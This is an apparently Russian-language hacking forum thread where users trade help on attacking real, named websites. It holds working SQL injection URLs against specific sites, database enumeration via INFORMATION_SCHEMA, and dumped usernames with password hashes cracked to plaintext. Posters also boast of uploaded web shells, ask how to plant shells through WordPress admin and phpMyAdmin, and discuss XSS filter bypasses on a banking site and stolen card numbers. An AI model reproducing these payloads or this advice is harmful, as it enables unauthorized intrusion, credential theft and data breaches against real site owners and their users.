del.+ __________ Add: А подзапросы то, оказывается, великая сила Только нудногеморная Но доступ к серву получил,шелл залит Всем помогавшим биг рэспект!
Такой вопрос по sql-inj: index.php?id=9999'+or+1=1/* срабатывает как полагается (выносятся все записи) index.php?id=9999'+or+1=2/* срабатывает тоже как надо (пустой результат) Но почему то, стоит добавить семиликон, всё похоже завершается ошибкой (пустой результат) index.php?id=9999'+or+1=1;/* В чём может быть дело. Вроде бы все субд понимают ; или нет ? Так же пробывал в URL кодировке - тоже самое
Не, в смысле как разделитель он может её не воспринимть, но как конец строки - это ведь ок и в MS и в My, разве нет ? В данном случае, ведь просто в конце строки ';' стоит.
Полистай: _https://forum.antichat.ru/threadnav43966-4-10.html Там обсуждали З.ы Слушай, а я ведь гоню, в конце строки должно работать, что-то я туплю Убери "/*"
Если это убрать то на сервере добавиться ' и всё превратиться в обычный строковый параметр, так что надо собственно ; убирать Ну это особо неважно, просто наблюдение. Вот где я застопорился серьёзно: www.city.kherson.ua/index.php?id=2351 берём кол-во параметров в select'e: www.city.kherson.ua/index.php?id=2351'group+by+15+/* аж 15.. извращённый запрос www.city.kherson.ua/index.php?id=2351'+UNION+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+/* пусто. Не подскажите ? Может сильно старая версия скуля ?
сабж такой..есть доступ в админку и вордпресс...вопрос знатокам....как залить шелл? через админку нереально...все файлы переделывает в 3аd4r6f3gf5 и тому подобное...
2 unit171 Там третий мускул.UNION'а нет _http://www.city.kherson.ua/index.php?id=2351'+and+substring(version(),1,1)=3/* А по поводу ; и -- я тебе тоже свои наблюдения высказавал.Возьми любую скуль и попробуй
Ситуация, получил я рута пасс через скулю,расшифровал хэш, в пхп майадмин залез (еле нашёл через гугол, руками на сайте хрен найдёшь ) Версия phpMyAdmin 2.11.2 setup. КАк залить шелл через неё? Директории на сервере я не знаю, точнее пути. И каким видом их вписывать? В общем растолкуйте плз. Заранее спасибо. З.Ы. Извините за тупость, я ещё только учусь
Всем спасибо, разобрался Шелл залит, vrotmnenogi.php Дико благодарен ачату, спасибо за советы и поддержку!
1.Хы,нашёл тут тоже пару xss-ок уже на другом банковском сайте Ж)).Вот думаю,париться или нет - там не дебилы всё же сидят и поймут гг,если просто применить тупо urlencoding.Можно ещё применить какой-либо метод кодирования ? Ибо со скулей ничего не вышло - 4-ая версия(ошибка в mysql_array,выводит только её,и хрен поймёшь,подобрал я имя таблицы правильно или нет).Сайт вообще какая-то дизайнерская студия разрабатывала =_=.Короче воть) 2. На мой вопрос,что делать с зашифрованными номерами кредиток так и не ответили( Напоминаю,что они 16-и значные =_______=),и расшифровать их мне не удастсо,даже если одни циффры там :Р). 3.А также,финальный мой вопрос из разряда *нупских* - Распишу поподробней: 1.Имеется file_priv на одном сайтеге,все пассы зашифрованы там Ж).Есть открытый порт 3306(ну мускул,превед тебе дарагой).Phpmyadmin там нету. Собственно, очень нужно знать - как залогиниться в бд, расшифровав хеши с mysql ? Какие средства нужно для этого использывать, ибо шелл не залить не зная полного пути и не имея конфигов(,да и кроме етк папи ниче не нащупал.). ЗЫ: Жду жду ждуууу атветов с нетерпением(только не глупых))))))))) ).
Велемир, 1. Что ты хочешь сделать с этими хсс? Впарить какому-нить клиенту? Ну впарь, только тебе это в любом случае мало что даст. Про скулю вообще молчу... (з.ы. банки не хранят данные о своих клиентах в бд на серве, на котором стоит сайт) 2. Забыть или расшифровывать. (в номере кредитки только цифры) 3. Если file_priv = 1, попробуй залить шелл одним из множества способов. Также если у тебя есть доступ к mysql.user, то можно попробовать расшифровать хэш и залогиница в базу, но стоит это делать при условии что доступ разрешен не только localhost, а это бывает достаточно редко
Возможли ли как-то реализовать хсску, если фильтр намертво отрезает все, что в <> и их самих тоже. варианты типа <<><><<<>as<a>><<sa>> пробовал, тупо ищет отрывающуюся закрывающуюся кавычки и стирает. " преобразует в " разрешены теги <b> <i> <li>, это не форум.
Если там не тоит <meta http-equiv="Content-Type" content="text/html; charset=кодировка> можно попробовть сделать это через юникод например как тут http://forum.antichat.ru/showpost.php?p=658326&postcount=16
Помогите плииз. Code: http://www.wrx-vladivostok.ru/news.php?id=100+and+1=0+UNION+SELECT+1,2,3/* matriza@localhost matriza_wrxvlad 5.0.27-standard-log Получил структуру базы данных через INFORMATION_SCHEMA.TABLES, но не могу вывести информацию из самой базы. * Code: http://www.wrx-vladivostok.ru/news.php?id=1+UNION+SELECT+TABLE_NAME,2,3+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+16,1/* 16: userlist 16.1: name 16.2: pass
http://www.wrx-vladivostok.ru/news.php?id=1+UNION+SELECT+concat_ws(CHAR(45),%60name%60,pass),2,3+FROM+matriza.userlist+LIMIT+2,1/* user-827ccb0eea8a706c4c34a16891f84e7b 827ccb0eea8a706c4c34a16891f84e7b = 12345 customer1-dc5c7986daef50c1e02ab09b442ee34f dc5c7986daef50c1e02ab09b442ee34f = 001
